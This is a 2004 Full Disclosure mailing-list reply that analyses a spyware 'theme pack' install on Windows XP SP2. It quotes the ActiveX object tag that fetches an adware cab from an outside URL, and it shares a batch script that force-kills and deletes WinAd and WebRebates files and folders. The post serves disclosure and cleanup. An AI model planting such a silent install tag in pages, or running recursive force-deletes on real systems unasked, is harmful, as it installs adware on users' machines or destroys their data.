Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Spyware installs ... XP SP2 box
From: "raize" <raize () gravito com>
Date: Tue, 05 Oct 2004 13:29:25 +0000

The installed code is definitely:

<object id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" 
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"; HEIGHT=0 WIDTH=0></object>

However, there is no exploit here. I loaded this with a default honeypot image of XPSP2 with IE as an Admin and nothing 
else installed other than the drop down that asked me if I really wanted to trust this site for installing an 
executable.

One must assume that you are installing these "theme packs" via some BHO (Browser Helper Object) that you installed 
previously or put the site on the "Always trust content from this provider". Perhaps someone else can explain where I 
am missing the exploit, because a quick glance over seems to indicate there is none for XP SP2. (I did not test this on 
SP1)

Spybot and Ad-aware do not catch and kill WinRebates and WinAd spy/adware properly, but I have a batch command that 
will do it for you. Included is a .zip of each IP contacted along with full URL request and output. It also contains 
the contents of this email and the batch file with these commands: (You'll want to rename the .txt to .bat)

--------------------------------------------
cd "C:\Program Files\Winad Client"
taskkill /T /F /IM WinClt.exe
taskkill /T /F /IM WinAd.exe
erase WinClt.exe
erase WinAd.exe
cd ..
cd Web_Rebates
taskkill /T /F /IM WebRebates0.exe
taskkill /T /F /IM WebRebates1.exe
erase WebRebates0.exe
erase WebRebates1.exe
cd ..
rd /Q /S "Winad Client"
rd /Q /S "Web_Rebates"
cd "C:\Windows\system32"
taskkill /T /F /IM fjdria.exe
taskkill /T /F /IM ezSP_Px.exe
erase fjdria.exe
erase ezSP_Px.exe

Attachment: themexp.zip
Description:


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]